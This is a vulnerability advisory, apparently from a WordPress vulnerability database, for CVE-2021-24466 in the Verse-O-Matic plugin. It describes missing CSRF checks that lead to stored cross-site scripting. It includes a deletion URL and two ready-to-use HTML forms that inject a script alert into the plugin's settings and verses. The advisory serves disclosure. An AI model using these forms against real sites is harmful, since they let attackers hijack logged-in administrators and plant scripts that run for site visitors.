Lucene search
Ajay Sandipan ThorboleWPEX-ID:37C7BDBB-F27F-47D3-9886-69D2E83D7581HistoryJul 19, 2021 - 12:00 a.m.
Verse-O-Matic <= 4.1.1 - CSRF to Stored XSS
2021-07-1900:00:00
Ajay Sandipan Thorbole
384
The plugin does not have any CSRF checks in place, allowing attackers to make logged in administrators do unwanted actions, such as add/edit/delete arbitrary verses and change the settings. Due to the lack of sanitisation in the settings and verses, this could also lead to Stored Cross-Site Scripting issues
Delete arbitrary Verse: https://example.com/wp-admin/options-general.php?page=verse-o-matic.php&action=delete&vomID=1
Stored XSS via settings:
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=verse-o-matic.php" method="POST">
<input type="hidden" name="vom_display" value="random" />
<input type="hidden" name="vom_switch" value="true" />
<input type="hidden" name="vom_staticID" value='"><script>alert(/XSS/)</script>' />
<input type="hidden" name="vom_limit" value="true" />
<input type="hidden" name="action" value="update_settings" />
<input type="hidden" name="EditSettings" value="Edit Settings รยป" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
XSS via added verse:
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=verse-o-matic.php" method="POST">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="vom_verseText" value="<script>alert(/XSS/)</script>" />
<input type="hidden" name="vom_visible" value="yes" />
<input type="hidden" name="save" value="Add Verse รยป" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Related
cvelist
cvelist
CVE-2021-24466 Verse-O-Matic <= 4.1.1 - CSRF to Stored XSS
2021-08-16 10:48:21
cve
cve
CVE-2021-24466
2021-08-16 11:15:00
prion
prion
Cross site scripting
2021-08-16 11:15:00
wpvulndb
wpvulndb
Verse-O-Matic <= 4.1.1 - CSRF to Stored XSS
2021-07-19 00:00:00
Related for WPEX-ID:37C7BDBB-F27F-47D3-9886-69D2E83D7581